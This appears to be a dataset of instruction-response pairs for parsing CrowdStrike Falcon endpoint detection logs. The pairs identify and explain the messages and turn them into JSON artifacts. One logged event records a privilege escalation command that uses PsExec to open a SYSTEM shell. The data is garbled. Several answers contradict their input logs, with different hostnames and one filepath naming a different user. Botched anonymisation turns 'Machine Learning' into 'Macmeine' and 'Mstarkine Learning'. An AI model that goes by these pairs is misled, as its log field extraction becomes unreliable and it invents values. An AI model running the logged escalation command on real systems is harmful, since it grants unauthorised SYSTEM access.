fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\johndoe\Downloads\PSTools\PsExec.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=42.170.66.194 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\johndoe\Downloads\PSTools\PsExec.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com clientmac: 0edeb6ae9241 filehash: 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b filename: PsExec.exe filepath: \Device\HarddiskVolume1\Users\INFRDEV-pentest\Downloads\PSTools\PsExec.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-08-29T18:24:34Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 42.170.66.194 userName: johndoe
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:nighthawk.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Macmeine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Macmeine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"nighthawk","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=106.244.59.7 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVISAASUATWEB01.devnvi.paygoint.com", "clientmac": "0a3ab18031e1", "filehash": "4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9", "filename": "VBCSCompiler.exe", "filepath": "\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"99994fe08640433a925c1d14d7175b2b\",\"timestamp\":\"2023-10-18T15:34:44Z\",\"behavior_id\":\"5737\",\"filename\":\"VBCSCompiler.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"D:\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\\\" \\\"-pipename:nighthawk.F.Z_dua+xQpvLuzUtnGY1TVjD6x\\\"\",\"scenario\":\"NGAV\",\"objective\":\"Falcon Detection Method\",\"tactic\":\"Macmeine Learning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Sensor-based ML\",\"technique_id\":\"CST0007\",\"display_name\":\"Macmeine Learning Identified Medium Confidence Malicious File\",\"description\":\"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.\",\"severity\":50,\"confidence\":50,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9\",\"ioc_source\":\"file_write\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6fc660c9\\\\a8ee7210\\\\App_Web_jjafca5y.dll\",\"user_name\":\"nighthawk\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-1290\",\"control_graph_id\":\"ctg:99994fe08640433a925c1d14d7175b2b:77309819454\",\"triggering_process_graph_id\":\"pid:99994fe08640433a925c1d14d7175b2b:761467075508\",\"sha256\":\"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9\",\"md5\":\"\",\"parent_details\":{\"parent_sha256\":\"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d\",\"parent_md5\":\"7dc642657b7cb790d687332f6d18feae\",\"parent_cmdline\":\"\\\"D:\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\csc.exe\\\" /shared /keepalive:\\\"10\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6fc660c9\\\\a8ee7210\\\\uprfi4r5.cmdline\\\"\",\"parent_process_graph_id\":\"pid:99994fe08640433a925c1d14d7175b2b:761464850144\"},\"pattern_disposition\":128,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_macmeine\":false,\"quarantine_file\":true,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=106.244.59.7 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-10-18T15:34:44Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "106.244.59.7", "userName": "nighthawk" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:nighthawk.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Macmeine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Macmeine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"nighthawk","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=106.244.59.7 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch
Product: Falcon Vendor: Crowdstrike
Identify this syslog message
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:nighthawk.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Macmeine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Macmeine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"nighthawk","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=106.244.59.7 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=nighthawk ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message: clienthostname: NVISAASUATWEB01.devnvi.paygoint.com clientmac: 0a3ab18031e1 filehash: 4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 filename: VBCSCompiler.exe filepath: \Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe messagetype: endpoint_protection_event productids: [7] senderhost: kafka.precinct sensitivity: normal severitycode: 4 severitylabel: warning sourceinfo: unknown starttimeutc: 2023-10-18T15:34:44Z tags: ['Crowdstrike Detection', 'endpoint_protection_event'] streamName: Crowdstrike Detection clientIP: 106.244.59.7 userName: nighthawk
Explain this syslog message
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:johndoe.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mstarkine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mstarkine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mstarkine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=95.100.116.230 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.starkint.com ::: pipelineEntrypoint=dispatch
{ "clienthostname": "NVISAASUATWEB01.devnvi.paygoint.com", "clientmac": "0a3ab18031e1", "filehash": "4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9", "filename": "VBCSCompiler.exe", "filepath": "\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe", "message": "WitFoo-Artifact ::: message={\"device_id\":\"99994fe08640433a925c1d14d7175b2b\",\"timestamp\":\"2023-10-18T15:34:44Z\",\"behavior_id\":\"5737\",\"filename\":\"VBCSCompiler.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"D:\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\\\" \\\"-pipename:johndoe.F.Z_dua+xQpvLuzUtnGY1TVjD6x\\\"\",\"scenario\":\"NGAV\",\"objective\":\"Falcon Detection Method\",\"tactic\":\"Mstarkine Learning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Sensor-based ML\",\"technique_id\":\"CST0007\",\"display_name\":\"Mstarkine Learning Identified Medium Confidence Malicious File\",\"description\":\"A file written to the file system meets the on-sensor mstarkine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.\",\"severity\":50,\"confidence\":50,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9\",\"ioc_source\":\"file_write\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6fc660c9\\\\a8ee7210\\\\App_Web_jjafca5y.dll\",\"user_name\":\"johndoe\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-1290\",\"control_graph_id\":\"ctg:99994fe08640433a925c1d14d7175b2b:77309819454\",\"triggering_process_graph_id\":\"pid:99994fe08640433a925c1d14d7175b2b:761467075508\",\"sha256\":\"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9\",\"md5\":\"\",\"parent_details\":{\"parent_sha256\":\"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d\",\"parent_md5\":\"7dc642657b7cb790d687332f6d18feae\",\"parent_cmdline\":\"\\\"D:\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\csc.exe\\\" /shared /keepalive:\\\"10\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6fc660c9\\\\a8ee7210\\\\uprfi4r5.cmdline\\\"\",\"parent_process_graph_id\":\"pid:99994fe08640433a925c1d14d7175b2b:761464850144\"},\"pattern_disposition\":128,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mstarkine\":false,\"quarantine_file\":true,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=95.100.116.230 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.starkint.com ::: pipelineEntrypoint=dispatch", "messagetype": "endpoint_protection_event", "productids": [ 7 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "severitycode": 4, "severitylabel": "warning", "sourceinfo": "unknown", "starttimeutc": "2023-10-18T15:34:44Z", "tags": [ "Crowdstrike Detection", "endpoint_protection_event" ], "streamName": "Crowdstrike Detection", "clientIP": "95.100.116.230", "userName": "johndoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:johndoe.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mstarkine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mstarkine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mstarkine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary 